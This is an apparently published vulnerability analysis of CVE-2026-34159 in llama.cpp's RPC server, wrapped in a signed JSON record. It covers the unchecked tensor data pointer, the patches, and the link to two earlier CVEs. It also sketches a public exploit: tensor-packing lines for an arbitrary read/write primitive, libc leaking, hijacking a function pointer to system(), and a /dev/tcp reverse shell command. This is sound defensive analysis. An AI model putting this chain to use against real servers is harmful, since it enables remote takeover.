-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 NEFARIOUSPLAN-CANONICAL-V1 {"body_md":"## The 2024 fix is per-handler. The deserializer is not.\n\n`deserialize_tensor` lives in `ggml/src/ggml-rpc/ggml-rpc.cpp`. It is the single deserialization point for tensors that arrive on the RPC server's TCP socket. Its job is to read a wire-format `rpc_tensor` (296 bytes, fixed layout) and produce a `ggml_tensor` that the rest of the server can compute over.\n\nThe wire format includes a 64-bit `data` pointer and a 64-bit `buffer` pointer. The `buffer` pointer is a handle the client received from a previous `ALLOC_BUFFER` reply; the server expects to recognize it. The `data` pointer names the address inside that buffer where the tensor's elements live. Both fields are honest most of the time. The threat model is the case where they are not.\n\nThe 2024 fix's structure inside `deserialize_tensor`, verbatim from current `master`:\n\n```cpp\nresult->buffer = reinterpret_cast(tensor->buffer);\nif (result->buffer && buffers.find(result->buffer) == buffers.end()) {\n result->buffer = nullptr;\n}\n\nif (result->buffer) {\n // require that the tensor data does not go beyond the buffer end\n uint64_t tensor_size = (uint64_t) ggml_nbytes(result);\n uint64_t buffer_start = (uint64_t) ggml_backend_buffer_get_base(result->buffer);\n uint64_t buffer_size = (uint64_t) ggml_backend_buffer_get_size(result->buffer);\n GGML_ASSERT(tensor->data + tensor_size >= tensor->data);\n GGML_ASSERT(tensor->data >= buffer_start && tensor->data + tensor_size <= buffer_start + buffer_size);\n}\n\nresult->op = (ggml_op) tensor->op;\n...\nresult->data = reinterpret_cast(tensor->data);\n```\n\nThree behaviors. First: cast the wire's `buffer` field to a pointer. Second: if that pointer is non-null but is not in the server's `buffers` set, replace it with null. Third: only run the data-bounds check when `result->buffer` is set. The `data` field is then assigned unconditionally at the bottom of the function. A tensor with `buffer=0` (a null cast from the wire) reaches the assignment with no bounds enforcement, carrying whatever 64-bit value the network put in `tensor->data`.\n\nThe 2024 patch's defensive layer was outside this function. From the GHSA's \"Relation to prior CVEs\" section, written by the reporter:\n\n> All three share the same underlying bug: `deserialize_tensor()` does not validate `tensor->data` when `buffer=0`. The 2024 patches added bounds checks in the GET_TENSOR and SET_TENSOR command handlers, but the GRAPH_COMPUTE command takes a separate code path (`graph_compute()` -> `create_node()` -> `deserialize_tensor()`) that was never patched.\n\nThe 2024 fix was per-handler. `set_tensor` got its own bounds check. `get_tensor` got its own. `deserialize_tensor` got the partial check that runs only when the buffer field is verifiable. `create_node`, the entry point for `GRAPH_COMPUTE`, got nothing. From August 2024 to March 2026, an attacker who sent a tensor with `buffer=0` through `GRAPH_COMPUTE` was reaching code that had not been told the input might be hostile.\n\n## The wire format ships an arbitrary R/W primitive, and GRAPH_COMPUTE consumes it.\n\nHassan Ali's PoC at `casp3r0x0/CVE-2026-34159` is a single Python script under 350 lines, targeting llama.cpp build b8487. It opens a TCP connection to the RPC port, sends `RPC_CMD_HELLO` (command code 14), and starts allocating buffers. Two RPC commands are needed before the primitive:\n\n```python\nRPC_CMD_ALLOC_BUFFER = 0\nRPC_CMD_BUFFER_GET_BASE = 3\nRPC_CMD_SET_TENSOR = 6\nRPC_CMD_GET_TENSOR = 8\nRPC_CMD_GRAPH_COMPUTE = 10\n```\n\n`ALLOC_BUFFER` returns a `(remote_ptr, size)` pair where `remote_ptr` is a server-side `ggml_backend_buffer*`. `BUFFER_GET_BASE` resolves that handle to the buffer's actual data region. After two commands the client has a handle the server recognizes, so future bounds checks against this buffer pass, and the absolute address of its data region, so the client can compute offsets inside it.\n\nThe exploit primitive is one `GRAPH_COMPUTE` graph with two tensors:\n\n```python\nsrc = self._pack_tensor(0x3001, 0, target_addr, GGML_OP_NONE, [], n_elems)\ndst = self._pack_tensor(0x3002, remote_ptr, buffer_base, GGML_OP_CPY, [0x3001], n_elems, flags=16)\n```\n\nSource tensor: `buffer = 0`, `data = target_addr`. Inside `deserialize_tensor`, the buffer cast is null, the lookup branch is unreached, the bounds-check branch is skipped. The server returns a `ggml_tensor` whose `data` pointer is `target_addr`, the address the attacker named.\n\nDestination tensor: `buffer = remote_ptr` (the handle from `ALLOC_BUFFER`, which IS in the server's `buffers` set), `data = buffer_base` (the real address of the buffer's data region). The buffer is recognized, the bounds check runs, the destination passes honestly.\n\n`create_node` calls `deserialize_tensor` for both. Both return non-null. The pre-patch `if (result == nullptr)` accepts both. The graph is queued and executed. The CPY kernel performs `memcpy(buffer_base, target_addr, n_bytes)`. The server has just read from any address the attacker named and copied the bytes into a buffer the attacker can pull back with `GET_TENSOR`.\n\nThat is an arbitrary read in two RPC commands. Reversing source and destination yields an arbitrary write. Both primitives bypass the bounds check because the source tensor has `buffer=0` and the bounds check is conditional on the buffer field being verifiable.\n\nThe exploit chain after the primitives is conventional. The PoC reads the `iface.get_base` function pointer from the staging buffer's `ggml_backend_buffer` struct, scans backward in 4 KiB pages for the ELF magic to find `libggml-base.so`, reads the GOT slot for `memcpy` to leak libc, scans backward for libc's ELF magic, fetches libc's `.note.gnu.build-id`, queries libc.rip for `system()`'s offset by build-id, writes `bash -c \"bash -i>&/dev/tcp// 0>&1\"` and the resolved `system()` address into the staging buffer, and arbitrary-writes those 64 bytes over the staging buffer's own iface struct, replacing `iface->clear` with `system()`. Then the PoC sends `RPC_CMD_BUFFER_CLEAR`, which calls `iface->clear(buf)`. The reverse shell connects back.\n\nThe seven phases of the chain are bookkeeping. The primitive is: the RPC server will perform a `memcpy` from any address to any address on the network's request, repeatedly.\n\n## The 2026 fix is at the call site. The deserializer is unchanged.\n\nThe patch in commit `39bf0d3` is three lines:\n\n```diff\n struct ggml_tensor * result = deserialize_tensor(ctx, tensor);\n- if (result == nullptr) {\n+ if (result == nullptr || result->buffer == nullptr) {\n+ GGML_LOG_ERROR(\"[%s] invalid tensor: null %s (id=%\" PRIu64 \")\\n\",\n+ __func__, result == nullptr ? \"tensor\" : \"buffer\", id);\n return nullptr;\n }\n```\n\nThe change is in `create_node`, inside the `GRAPH_COMPUTE` handler. `deserialize_tensor` is not modified. The maintainer who merged it noted on the PR that \"tensor views within the compute graph are initialized through `ggml_backend_view_init()`, which includes assertions that prevent null buffer pointers in valid tensors. This validation makes the additional check sufficiently protective.\"\n\nThe 2026 patch follows the 2024 patch's shape. Each patch closes the specific call site that the specific CVE reached. `set_tensor` got its own bounds check in 2024. `get_tensor` got its own in 2024. `create_node` got its null check in 2026. The function they all call still returns tensors with null buffers and attacker-controlled `data` pointers.\n\nThe reviewer's reasoning is correct for the existing handlers. The bounds checks in `set_tensor` and `get_tensor` validate `tensor->data` directly against the buffer the wire claims. The `create_node` null check rejects null-buffer tensors before they reach a kernel. Together they cover the four RPC commands that pass tensors to dangerous code: `SET_TENSOR`, `GET_TENSOR`, `COPY_TENSOR`, `GRAPH_COMPUTE`. Any future RPC command that calls `deserialize_tensor` and uses `result->data` will need its own equivalent guard at its own call site. The contract of `deserialize_tensor` is still: return a struct whose pointers may be whatever the network said.\n\n## Three CVEs reach the same deserializer.\n\nCVE-2024-42478 (b3561, August 2024): \"The unsafe `data` pointer member in the `rpc_tensor` structure can cause arbitrary address reading.\" Reached through `GET_TENSOR`. Patched by adding a bounds check in `get_tensor`.\n\nCVE-2024-42479 (b3561, August 2024): \"The unsafe `data` pointer member in the `rpc_tensor` structure can cause arbitrary address writing.\" Reached through `SET_TENSOR`. Patched by adding a bounds check in `set_tensor`.\n\nCVE-2026-34159 (b8492, March 2026): \"The RPC backend's `deserialize_tensor()` skips all bounds validation when a tensor's buffer field is 0.\" Reached through `GRAPH_COMPUTE`. Patched by adding a null-buffer check in `create_node`.\n\nThree CVEs. Three fixes. Three different RPC handlers. One file. The deserialization function that produces the unsafe tensor in every path is the same in 2026 as it was before any of the three patches landed. From the reporter's own writeup of CVE-2026-34159, in the GHSA: \"All three share the same underlying bug: `deserialize_tensor()` does not validate `tensor->data` when `buffer=0`.\"\n\nThis is what [Design Debt Driver](/patterns/design-debt-driver) names. A component whose architecture produces the same bug class on a cadence, where each patch closes the specific instance and leaves the substrate intact. Tomcat's [`EncryptInterceptor`](/posts/tomcat-encryptinterceptor-fails-open) shipped two CVEs from the same `messageReceived` method this season, the second introduced by the patch for the first. llama.cpp's RPC backend produces them by handler: every command that takes a tensor on the wire is its own opportunity for the wire's data pointer to escape. Closing the symptom in three handlers does not change the deserializer's contract. The next handler that calls `deserialize_tensor` and uses `result->data` without a local guard reproduces the primitive.\n\nThe closer kin is [Unpatchable Primitive](/patterns/unpatchable-primitive). The RPC backend's job is to deserialize attacker-controlled tensor structures from the network and execute compute graphs over them. The structures contain pointers; the compute graphs run `memcpy`. Removing the primitive cleanly would mean rejecting every tensor whose `data` field cannot be proven to lie inside a known buffer, regardless of which call site reached the deserializer. That is a refactor of `deserialize_tensor`, not a guard at one of its consumers. Two CVE cycles have ended without that refactor.\n\n## What the advisory says, and what NVD does not.\n\nThe GHSA includes a \"Relation to prior CVEs\" section that names CVE-2024-42478, CVE-2024-42479, and the architectural fact that the GRAPH_COMPUTE path was never patched. The reporter, GitHub user `las7`, wrote that section himself and filed via CERT/CC on February 8, 2026. The advisory text says the three CVEs share one root cause.\n\nNVD's CVE-2026-34159 entry says the bug is missing bounds validation when `buffer=0` and that the patch is in version b8492. It does not link to the 2024 CVEs. The CWE assigned is CWE-119, the same CWE assigned to CVE-2024-42478 and CVE-2024-42479. A defender reading NVD sees a single CVE with a buffer-validation bug. A defender reading the GHSA sees the third CVE in a class that the reporter has named.\n\nThe 2024 fix that produced the partial bounds check inside `deserialize_tensor` also moved the RPC server's default bind address from `0.0.0.0` to `127.0.0.1` and added a runtime warning when the operator binds elsewhere. The README warns, in 2026 as in 2024, that the RPC backend is \"currently in a proof-of-concept development stage\" and that exposing the port is \"dangerous and should be avoided.\" The CVSS:3.1 vector on the new CVE is `AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`: network-reachable, low complexity, no privileges, no interaction. The README's framing assumes operators who read warnings. The CVSS framing assumes operators who deploy the feature anyway. The 2024 default-bind change addressed the first audience. The exploit chain works against the second.\n\nPoC: [casp3r0x0/CVE-2026-34159](https://github.com/casp3r0x0/CVE-2026-34159)","closing_line":"Three CVEs reach the same deserializer. The three patches do not touch the deserializer.","hook_md":"The patch is three lines. The bug is in the function none of the three patches changed.\n\nIn August 2024, llama.cpp closed CVE-2024-42478 and CVE-2024-42479: arbitrary read and arbitrary write through the `data` pointer in the wire-format `rpc_tensor` struct. The 2024 fix added bounds checks in `set_tensor`, in `get_tensor`, and a conditional check inside `deserialize_tensor` itself. The conditional runs only when the tensor's `buffer` field matches a known server-side allocation. When the buffer field is null, the check is skipped and the function returns a tensor whose `data` pointer is whatever the network sent. The 2024 patches added bounds checks at the call sites that produced the original CVEs. They did not add one to the path that calls `deserialize_tensor` for `GRAPH_COMPUTE`. CVE-2026-34159 is the exploit that walks the unpatched call site and uses the server's own `memcpy` as an arbitrary read-and-write primitive.","post_id":47,"slug":"llama-cpp-cve-2026-34159-deserializer-three-cves-have-not-patched","title":"CVE-2026-34159: The Deserializer Three CVEs Have Not Patched","type":"initial","unreadable_sentence":"Three CVEs reach the same deserializer. The three patches do not touch the deserializer."} -----BEGIN PGP SIGNATURE----- iHUEARYIAB0WIQRf0htP5+SjynlxywneZjl4jgkQJgUCagYALQAKCRDeZjl4jgkQ JrtwAQDVlf/UGVw+iHkccCslnI7qoLaoUVlnW1uWJHtslughxgD8CaH1MSK7ltXc wBZ8zx9aQRM2Z2BwS0nOm6cq4zW/owQ= =zb3N -----END PGP SIGNATURE-----